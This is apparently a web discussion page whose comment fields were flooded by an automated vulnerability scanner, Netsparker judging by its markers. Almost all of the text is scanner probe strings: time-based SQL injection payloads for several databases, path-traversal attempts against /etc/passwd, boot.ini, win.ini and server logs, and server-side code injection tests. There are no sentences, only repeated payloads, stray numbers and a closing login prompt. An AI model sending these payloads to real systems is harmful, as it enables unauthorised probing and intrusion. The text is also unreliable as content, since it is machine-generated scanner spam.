1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

/etc/passwd

3

3

"+response.write(268409241-22)+"

ns:netsparker056650=vuln

syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

<% response.write(268409241-22) %>

add-comment-do

3

ns:netsparker056650=vuln

3

syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

3

<% response.write(268409241-22) %>

add-comment-do

3

-1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1

print(int)0xFFF9999-22

add-comment-do

3

3

3

-1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1

3

print(int)0xFFF9999-22

add-comment-do

3

(select sleep(25))a-- 1

+print(int)0xFFF9999-22;//

data:;base64,TlM3NzU0NTYxNDQ2NTc1

3

3

3

+print(int)0xFFF9999-22;//

3

(select sleep(25))a-- 1

data:;base64,TlM3NzU0NTYxNDQ2NTc1

3

'+print(int)0xFFF9999-22+'

(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)

/discussion/6661/add-comment-do

3

3

3

'+print(int)0xFFF9999-22+'

3

(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)

/discussion/6661/add-comment-do

3

"+print(int)0xFFF9999-22+"

1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '

/6661/add-comment-do

3

"+print(int)0xFFF9999-22+"

3

3

3

1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '

/6661/add-comment-do

3

';SELECT pg_sleep(25)--

../../../../../../../../../../boot.ini

3

3

../../../../../../../../../../boot.ini

3

';SELECT pg_sleep(25)--

{php}print(int)0xFFF9999-22;{/php}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini

1;SELECT pg_sleep(25)--

3

{php}print(int)0xFFF9999-22;{/php}

3

1;SELECT pg_sleep(25)--

3

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini

SELECT pg_sleep(25)--

'{${print(int)0xFFF9999-22}}'

../../../../../../../../../../boot.ini.php

3

SELECT pg_sleep(25)--

3

../../../../../../../../../../boot.ini.php

3

'{${print(int)0xFFF9999-22}}'

1);SELECT pg_sleep(25)--

/../../../../../../../../../../boot.ini

[php]print(int)0xFFF9999-22;[/php]

3

1);SELECT pg_sleep(25)--

3

/../../../../../../../../../../boot.ini

');SELECT pg_sleep(25)--

3

[php]print(int)0xFFF9999-22;[/php]

file:/windows/win.ini

3

');SELECT pg_sleep(25)--

print 0xFFF9999-22

3

file:/windows/win.ini

'));SELECT pg_sleep(25)--

3

print 0xFFF9999-22

../../../../../../../../../../windows/win.ini

3

'));SELECT pg_sleep(25)--

eval('print 0xFFF9999-22')

3

../../../../../../../../../../windows/win.ini

1));SELECT pg_sleep(25)--

3

eval('print 0xFFF9999-22')

../../../../../../../../../../windows/win.ini.php

3

1));SELECT pg_sleep(25)--

'+print 0xFFF9999-22+'

3

../../../../../../../../../../windows/win.ini.php

1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1

3

'+print 0xFFF9999-22+'

c:\windows\win.ini

3

1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1

"+print 0xFFF9999-22+"

3

c:\windows\win.ini

(SELECT 1 FROM (SELECT SLEEP(25))A)

3

"+print 0xFFF9999-22+"

../../../../../../../../../../windows/iis6.log

3

<%a style=x:expre/**/ssion(netsparker(0x001883))>

3

(SELECT 1 FROM (SELECT SLEEP(25))A)

3

../../../../../../../../../../windows/iis6.log

;ns:expression(netsparker(0x0018E8));

'+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

../../../../../../../../../../proc/self/fd/2

3

'+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

3

;ns:expression(netsparker(0x0018E9));

3

../../../../../../../../../../proc/self/fd/2

-1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+'

body{x:expression(netsparker(0x0018EC))}

../../../../../../../../../../proc/self/fd/2.php

3

-1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+'

3

body{x:expression(netsparker(0x0018ED))}

3

../../../../../../../../../../proc/self/fd/2.php

-1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)

*/netsparker(0x0018F4);/*

../../../../../../../../../../etc/httpd/logs/error.log

3

-1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)

3

*/netsparker(0x0018F5);/*

3

../../../../../../../../../../etc/httpd/logs/error.log

-1" or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+"

'+netsparker(0x0018F8)+'

../../../../../../../../../../etc/httpd/logs/error_log

3

-1" or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+"

3

'+netsparker(0x0018F9)+'

3

../../../../../../../../../../etc/httpd/logs/error_log

"+netsparker(0x0018FE)+"

../../../../../../../../../../var/log/apache2/error.log

3

"+netsparker(0x0018FF)+"

3

../../../../../../../../../../var/log/apache2/error.log

',netsparker(0x001902),'

../../../../../../../../../../var/log/apache/error.log

3

',netsparker(0x001903),'

3

../../../../../../../../../../var/log/apache/error.log

netsparker(0x001906)

../../../../../../../../../../proc/version

3

netsparker(0x001907)

3

../../../../../../../../../../proc/version

netsparker(0x00190A);

../../../../../../../../../../proc/version.php

3

netsparker(0x00190B);

3

../../../../../../../../../../proc/version.php

'+netsparker(0x00190E)+'

../../../../../../../../../../../etc/passwd

3

'+netsparker(0x00190F)+'

3

../../../../../../../../../../../etc/passwd

../../../../../../../../../../../etc/passwd

3

3

3

../../../../../../../../../../../etc/passwd

../../../../../../../../../../../etc/passwd.php

3

3

3

../../../../../../../../../../../etc/passwd.php

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

3

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

ns../../../../../../../../../../boot.ini........................................................................................................................................................

3

ns../../../../../../../../../../boot.ini........................................................................................................................................................

/../../../../../../../../../../../etc/passwd

3

/../../../../../../../../../../../etc/passwd

/etc/passwd

3

/etc/passwd

add-comment-do

3

add-comment-do

add-comment-do

3

add-comment-do

data:;base64,TlM3NzU0NTYxNDQ2NTc1

3

data:;base64,TlM3NzU0NTYxNDQ2NTc1

/discussion/6661/add-comment-do

3

/discussion/6661/add-comment-do

/6661/add-comment-do

3

/6661/add-comment-do

Anonymous

3

3
Login to leave a comment